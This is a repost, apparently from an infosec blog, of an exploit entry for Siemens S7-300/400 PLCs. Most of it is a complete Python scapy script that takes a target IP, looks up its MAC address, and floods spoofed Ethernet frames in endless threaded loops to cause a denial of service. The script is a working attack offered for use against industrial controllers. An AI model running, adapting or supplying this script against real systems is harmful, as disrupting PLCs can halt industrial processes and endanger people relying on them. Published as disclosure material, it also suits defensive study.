Saturday, July 20, 2024

Siemens S7 Layer 2 – Denial of Service (DoS)

# Exploit Title: Siemens S7 Layer 2 - Denial of Service (DoS)
# Exploit Author: RoseSecurity
# Vendor Homepage: https://www.siemens.com/us/en.html
# Version: Firmware versions >= 3
# Tested on: Siemens S7-300, S7-400 PLCs


#!/usr/bin/python3

from scapy.all import *
from colorama import Fore, Back, Style
from subprocess import Popen, PIPE
from art import *
import threading
import subprocess
import time
import os
import sys
import re

# Banner

print(Fore.RED + r"""

 ▄▄▄· ▄• ▄▌▄▄▄▄▄      • ▌ ▄ ·.  ▄▄▄· ▄▄▄▄▄      ▄▄▄   
▐█ ▀█ █▪██▌•██  ▪     ·██ ▐███▪▐█ ▀█ •██  ▪     ▀▄ █· 
▄█▀▀█ █▌▐█▌ ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▄█▀▀█  ▐█.▪ ▄█▀▄ ▐▀▀▄  
▐█ ▪▐▌▐█▄█▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌ 
 ▀  ▀  ▀▀▀  ▀▀▀  ▀█▄▀▪▀▀  █▪▀▀▀ ▀  ▀  ▀▀▀  ▀█▄▀▪.▀  ▀ 
▄▄▄▄▄▄▄▄ .▄▄▄  • ▌ ▄ ·. ▪   ▐ ▄  ▄▄▄· ▄▄▄▄▄      ▄▄▄  
•██  ▀▄.▀·▀▄ █··██ ▐███▪██ •█▌▐█▐█ ▀█ •██  ▪     ▀▄ █·
 ▐█.▪▐▀▀▪▄▐▀▀▄ ▐█ ▌▐▌▐█·▐█·▐█▐▐▌▄█▀▀█  ▐█.▪ ▄█▀▄ ▐▀▀▄ 
 ▐█▌·▐█▄▄▌▐█•█▌██ ██▌▐█▌▐█▌██▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌
 ▀▀▀  ▀▀▀ .▀  ▀▀▀  █▪▀▀▀▀▀▀▀▀ █▪ ▀  ▀  ▀▀▀  ▀█▄▀▪.▀  ▀
                """)

time.sleep(1.5)

# Get IP to exploit

IP = input("Enter the IP address of the device to exploit: ")

# Find the mac address of the device

Mac = getmacbyip(IP)

# Function to send the ouput to "nothing"

def NULL ():

    f = open(os.devnull, 'w')
    sys.stdout = f

# Eternal loop to produce DoS condition

def Arnold ():

    AutomatorTerminator = True

    while AutomatorTerminator == True:
        Packet = Ether()
        Packet.dst = "00:00:00:00:00:00"
        Packet.src = Mac
        sendp(Packet)
        NULL()
def Sarah ():

    AutomatorTerminator = True

    while AutomatorTerminator == True:
        Packet = Ether()
        Packet.dst = "00:00:00:00:00:00"
        Packet.src = Mac
        sendp(Packet)
        NULL()
def Kyle ():
    AutomatorTerminator = True

    while AutomatorTerminator == True:
        Packet = Ether()
        Packet.dst = "00:00:00:00:00:00"
        Packet.src = Mac
        sendp(Packet)
        NULL()

# Arnold
ArnoldThread = threading.Thread(target=Arnold)
ArnoldThread.start()
ArnoldThread.join()
NULL()

# Sarah

SarahThread = threading.Thread(target=Sarah)
SarahThread.start()
SarahThread.join()
NULL()

# Kyle

KyleThread = threading.Thread(target=Kyle)
KyleThread.start()
KyleThread.join()
NULL()
            
Bookmark
Share the word, let's increase Cybersecurity Awareness as we know it
Recommended:  OctoBot WebInterface - Remote Code Execution (RCE) - 0.4.3
- Sponsored -

Sponsored Offer

Unleash the Power of the Cloud: Grab $200 Credit for 60 Days on DigitalOcean!

Digital ocean free 200

Discover more infosec

User Avatar
Steven Black (n0tst3)
Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK. I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated... I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK. I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!

more infosec reads

Subscribe for weekly updates

explore

more

security